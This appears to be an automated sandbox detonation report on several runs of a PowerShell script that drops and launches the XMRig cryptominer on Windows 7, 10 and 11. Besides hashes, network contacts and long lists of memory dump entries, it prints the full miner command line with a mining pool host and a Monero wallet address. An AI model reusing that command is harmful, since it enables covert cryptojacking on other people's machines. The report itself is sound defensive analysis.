memory/1204-122-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-123-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-124-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-125-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-126-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-127-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-128-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-129-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-130-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-131-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-132-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-133-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-134-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-135-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-136-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-137-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-138-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-139-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-140-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-141-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-142-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-143-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-144-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-145-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-146-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-147-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-148-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-149-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-150-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-151-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-152-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-153-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-154-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-155-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-156-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-157-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-158-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4704-0-0x00007FFB141D3000-0x00007FFB141D4000-memory.dmp

memory/4704-5-0x000002ADC4210000-0x000002ADC4232000-memory.dmp

memory/4704-8-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/4704-9-0x000002ADC4340000-0x000002ADC43B6000-memory.dmp

memory/4704-10-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sbighjrj.uz2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4704-25-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/4704-48-0x000002ADC4190000-0x000002ADC41A2000-memory.dmp

memory/4704-61-0x000002ADC4180000-0x000002ADC418A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1560-90-0x000001996BCE0000-0x000001996BD00000-memory.dmp

memory/1560-91-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-92-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/4704-93-0x00007FFB141D3000-0x00007FFB141D4000-memory.dmp

memory/4704-94-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/4704-95-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/1560-96-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-97-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-98-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-99-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-100-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-101-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-102-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-103-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-104-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-105-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-106-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-107-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-108-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-109-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-110-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-111-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-112-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-113-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-114-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-115-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-116-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-117-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-118-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-119-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-120-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-121-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-122-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-123-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-124-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-125-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-126-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-127-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-128-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-129-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-130-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-131-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-132-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-133-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-134-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-135-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-136-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-137-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-138-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-139-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-140-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-141-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-142-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-143-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-144-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-145-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-146-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-147-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-148-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-149-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-150-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-151-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-152-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-153-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-154-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-155-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-156-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:17

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/824-0-0x00007FFC92233000-0x00007FFC92234000-memory.dmp

memory/824-5-0x00000224AEB00000-0x00000224AEB22000-memory.dmp

memory/824-9-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-10-0x00000224AF5F0000-0x00000224AF666000-memory.dmp

memory/824-11-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rteevrbk.lhl.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/824-26-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-49-0x00000224AF5C0000-0x00000224AF5D2000-memory.dmp

memory/824-62-0x00000224AF5A0000-0x00000224AF5AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4208-91-0x000001E0E3850000-0x000001E0E3870000-memory.dmp

memory/4208-92-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/824-94-0x00007FFC92233000-0x00007FFC92234000-memory.dmp

memory/824-95-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/4208-93-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/824-96-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-97-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/4208-98-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-99-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-100-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-101-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-102-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-103-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-104-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-105-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-106-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-107-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-108-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-109-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-110-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-111-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-112-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-113-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-114-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-115-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-116-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-117-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-118-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-119-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-120-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-121-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-122-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-123-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-124-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-125-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-126-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-127-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-128-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-129-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-130-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-131-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-132-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-133-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-134-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-135-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-136-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-137-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-138-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-139-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-140-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-141-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-142-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-143-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-144-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-145-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-146-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-147-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-148-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-149-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-150-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-151-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-152-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-153-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-154-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-155-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-156-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-157-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-158-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win7-20240221-en

Max time kernel

1563s

Max time network

1568s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Network

N/A

Files

memory/2904-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

memory/2904-5-0x000000001B390000-0x000000001B672000-memory.dmp

memory/2904-6-0x0000000002220000-0x0000000002228000-memory.dmp

memory/2904-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-11-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-12-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:12

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1741s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
